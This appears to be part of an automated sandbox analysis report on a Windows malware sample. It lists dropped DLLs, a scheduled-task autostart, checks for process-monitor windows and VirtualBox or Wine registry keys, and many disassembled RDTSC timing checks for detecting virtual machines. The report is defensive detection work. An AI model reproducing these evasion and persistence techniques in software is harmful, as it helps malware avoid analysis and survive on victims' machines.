Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3755F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C3755F0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 73EB61 second address: 73EB67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 73EB67 second address: 73EB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE851EFD98h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 73EB83 second address: 73EB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB27 second address: 8CAB35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FEE851EFD86h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB35 second address: 8CAB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB3B second address: 8CAB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FEE851EFD8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB49 second address: 8CAB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEE84E88FCEh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CAB57 second address: 8CAB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FEE851EFDB2h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C9D74 second address: 8C9D93 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEE84E88FDAh 0x00000008 jmp 00007FEE84E88FD2h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CA46C second address: 8CA473 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CA473 second address: 8CA498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FEE84E88FD9h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CA498 second address: 8CA4A2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEE851EFD86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CA4A2 second address: 8CA4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC5A9 second address: 73EB61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 674EC9FAh 0x00000010 and ecx, dword ptr [ebp+122D2B99h] 0x00000016 push dword ptr [ebp+122D058Dh] 0x0000001c mov ecx, dword ptr [ebp+122D2BA1h] 0x00000022 call dword ptr [ebp+122D2D09h] 0x00000028 pushad 0x00000029 pushad 0x0000002a push edx 0x0000002b mov esi, dword ptr [ebp+122D29A5h] 0x00000031 pop esi 0x00000032 movsx ecx, bx 0x00000035 popad 0x00000036 xor eax, eax 0x00000038 cmc 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d stc 0x0000003e mov dword ptr [ebp+122D2A8Dh], eax 0x00000044 mov dword ptr [ebp+122D19CEh], ecx 0x0000004a mov esi, 0000003Ch 0x0000004f cmc 0x00000050 add esi, dword ptr [esp+24h] 0x00000054 stc 0x00000055 lodsw 0x00000057 jl 00007FEE851EFD87h 0x0000005d clc 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 call 00007FEE851EFD96h 0x00000068 mov ecx, dword ptr [ebp+122D2CE1h] 0x0000006e pop eax 0x0000006f jmp 00007FEE851EFD8Bh 0x00000074 popad 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 jno 00007FEE851EFD87h 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 pushad 0x00000085 popad 0x00000086 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC643 second address: 8CC676 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEE84E88FC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FEE84E88FCFh 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007FEE84E88FCDh 0x0000001b push eax 0x0000001c push edx 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC676 second address: 8CC685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC7AF second address: 8CC7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC7B5 second address: 8CC86C instructions: 0x00000000 rdtsc 0x00000002 js 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 55D2D691h 0x00000013 xor edx, 409D5CF5h 0x00000019 push 00000003h 0x0000001b jmp 00007FEE851EFD96h 0x00000020 or dword ptr [ebp+122D1A2Ah], esi 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007FEE851EFD88h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 push 00000003h 0x00000044 mov edi, dword ptr [ebp+122D2D9Ah] 0x0000004a call 00007FEE851EFD89h 0x0000004f jnp 00007FEE851EFD92h 0x00000055 push eax 0x00000056 pushad 0x00000057 jmp 00007FEE851EFD90h 0x0000005c pushad 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f jc 00007FEE851EFD86h 0x00000065 popad 0x00000066 popad 0x00000067 mov eax, dword ptr [esp+04h] 0x0000006b push eax 0x0000006c push edx 0x0000006d push edi 0x0000006e jmp 00007FEE851EFD96h 0x00000073 pop edi 0x00000074 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC86C second address: 8CC871 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC871 second address: 8CC8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FEE851EFD90h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jmp 00007FEE851EFD91h 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ebx 0x0000001c popad 0x0000001d pop eax 0x0000001e jmp 00007FEE851EFD93h 0x00000023 lea ebx, dword ptr [ebp+1246150Ah] 0x00000029 movsx edi, ax 0x0000002c xchg eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jl 00007FEE851EFD88h 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC92D second address: 8CC93E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC93E second address: 8CC9EB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEE851EFD8Ch 0x00000008 jo 00007FEE851EFD86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D321Fh], edi 0x00000017 movsx esi, cx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FEE851EFD88h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 mov ch, 82h 0x00000038 mov edx, dword ptr [ebp+122D2B35h] 0x0000003e push 8B3CBEFBh 0x00000043 jmp 00007FEE851EFD8Fh 0x00000048 add dword ptr [esp], 74C34185h 0x0000004f push ebx 0x00000050 mov edi, esi 0x00000052 pop edx 0x00000053 push 00000003h 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007FEE851EFD88h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f push 00000000h 0x00000071 mov ecx, dword ptr [ebp+122D2A2Dh] 0x00000077 push 00000003h 0x00000079 mov di, 1E7Dh 0x0000007d push EF340851h 0x00000082 push eax 0x00000083 push edx 0x00000084 jmp 00007FEE851EFD8Fh 0x00000089 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC9EB second address: 8CC9F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CC9F1 second address: 8CCA42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 2F340851h 0x00000012 mov dword ptr [ebp+122D1A54h], edi 0x00000018 lea ebx, dword ptr [ebp+12461515h] 0x0000001e jmp 00007FEE851EFD8Ch 0x00000023 mov dl, bl 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jg 00007FEE851EFD86h 0x0000002f ja 00007FEE851EFD86h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CCA42 second address: 8CCA6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FEE84E88FC6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEE84E88FD8h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8CCA6B second address: 8CCA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EBAC2 second address: 8EBAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EBD75 second address: 8EBD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EBD7D second address: 8EBD94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FEE84E88FC6h 0x0000000a jc 00007FEE84E88FC6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EBD94 second address: 8EBD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EC34F second address: 8EC354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EC354 second address: 8EC386 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEE851EFD9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEE851EFD8Eh 0x0000000f ja 00007FEE851EFD86h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EC386 second address: 8EC3AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FEE84E88FCAh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8EC3AE second address: 8EC3BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ECC41 second address: 8ECC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8E4588 second address: 8E459F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FEE851EFD86h 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007FEE851EFD86h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8E459F second address: 8E45C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEE84E88FCFh 0x0000000e jne 00007FEE84E88FCCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ECD93 second address: 8ECD98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED2F7 second address: 8ED2FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED2FB second address: 8ED30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FEE851EFD8Ch 0x0000000c jnp 00007FEE851EFD86h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED775 second address: 8ED77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED77E second address: 8ED782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8ED782 second address: 8ED7B3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FEE84E88FCDh 0x0000000d pushad 0x0000000e jmp 00007FEE84E88FD9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8E45BF second address: 8E45C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8F36D9 second address: 8F36E3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8F36E3 second address: 8F372A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FEE851EFD86h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FEE851EFD95h 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007FEE851EFD8Ch 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 jo 00007FEE851EFD98h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8F372A second address: 8F372E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FAF89 second address: 8FAF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FAF8D second address: 8FAF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FAF9A second address: 8FAFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB0BE second address: 8FB0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB0C2 second address: 8FB0D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FEE851EFD86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB0D2 second address: 8FB0FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007FEE84E88FC8h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8FB645 second address: 8FB649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
